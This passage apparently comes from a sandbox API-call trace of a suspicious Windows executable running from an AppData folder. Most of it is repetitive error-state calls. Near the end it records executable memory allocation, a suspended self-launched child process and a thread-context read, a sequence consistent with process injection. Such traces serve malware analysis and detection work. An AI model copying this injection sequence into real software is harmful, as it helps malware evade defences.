¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x45\x35\x46\xdd\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0065.921] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x50d980, nSize=0x104 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\adsldraw\\autoclb.exe")) returned 0x36 [0065.921] GetLastError () returned 0x0 [0065.921] SetLastError (dwErrCode=0x0) [0065.921] GetLastError () returned 0x0 [0065.921] SetLastError (dwErrCode=0x0) [0065.921] GetLastError () returned 0x0 [0065.921] SetLastError (dwErrCode=0x0) [0065.921] GetLastError () returned 0x0 [0065.921] SetLastError (dwErrCode=0x0) [0065.921] GetLastError () returned 0x0 [0065.921] SetLastError (dwErrCode=0x0) [0065.921] GetLastError () returned 0x0 [0065.921] SetLastError (dwErrCode=0x0) [0065.921] GetLastError () returned 0x0 [0065.921] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.922] SetLastError (dwErrCode=0x0) [0065.922] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.923] SetLastError (dwErrCode=0x0) [0065.923] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.924] SetLastError (dwErrCode=0x0) [0065.924] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.925] SetLastError (dwErrCode=0x0) [0065.925] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.926] SetLastError (dwErrCode=0x0) [0065.926] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.927] SetLastError (dwErrCode=0x0) [0065.927] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.928] SetLastError (dwErrCode=0x0) [0065.928] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.929] SetLastError (dwErrCode=0x0) [0065.929] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.930] GetLastError () returned 0x0 [0065.930] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.931] GetLastError () returned 0x0 [0065.931] SetLastError (dwErrCode=0x0) [0065.933] GetLastError () returned 0x0 [0065.933] SetLastError (dwErrCode=0x0) [0065.933] GetLastError () returned 0x0 [0065.933] SetLastError (dwErrCode=0x0) [0065.933] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.934] SetLastError (dwErrCode=0x0) [0065.934] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.935] SetLastError (dwErrCode=0x0) [0065.935] GetLastError () returned 0x0 [0065.936] SetLastError (dwErrCode=0x0) [0065.936] GetLastError () returned 0x0 [0065.936] SetLastError (dwErrCode=0x0) [0065.936] GetLastError () returned 0x0 [0065.936] SetLastError (dwErrCode=0x0) [0065.936] GetLastError () returned 0x0 [0065.936] SetLastError (dwErrCode=0x0) [0065.936] GetLastError () returned 0x0 [0065.936] SetLastError (dwErrCode=0x0) [0065.937] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0065.937] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40c6c1) returned 0x0 [0065.937] GetLastError () returned 0x0 [0065.937] SetLastError (dwErrCode=0x0) [0065.937] GetLastError () returned 0x0 [0065.937] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.939] SetLastError (dwErrCode=0x0) [0065.939] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.940] SetLastError (dwErrCode=0x0) [0065.940] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0069.784] GetProcAddress (hModule=0x75260000, lpProcName="VirtualAlloc") returned 0x75278b70 [0069.785] VirtualAlloc (lpAddress=0x0, dwSize=0xb09eb, flAllocationType=0x1000, flProtect=0x40) returned 0x8b0000 [0069.827] GetProcAddress (hModule=0x75260000, lpProcName="VirtualAlloc") returned 0x75278b70 [0069.827] GetProcAddress (hModule=0x75260000, lpProcName="ExitProcess") returned 0x752874f0 [0069.827] VirtualAlloc (lpAddress=0x0, dwSize=0x6e800, flAllocationType=0x1000, flProtect=0x40) returned 0x7f0000 [0069.841] VirtualAlloc (lpAddress=0x0, dwSize=0x1be0, flAllocationType=0x3000, flProtect=0x40) returned 0x2b0000 [0069.846] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x190ff8, nSize=0x103 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\adsldraw\\autoclb.exe")) returned 0x36 [0069.847] GetCommandLineW () returned="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"" [0069.847] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpCommandLine="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x190fa0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x191290 | out: lpCommandLine="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", lpProcessInformation=0x191290*(hProcess=0x17c, hThread=0x178, dwProcessId=0xfb8, dwThreadId=0xfbc)) returned 1 [0069.863] GetThreadContext (in: hThread=0x178, lpContext=0x190cb0 | out: lpContext=0x190cb0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, 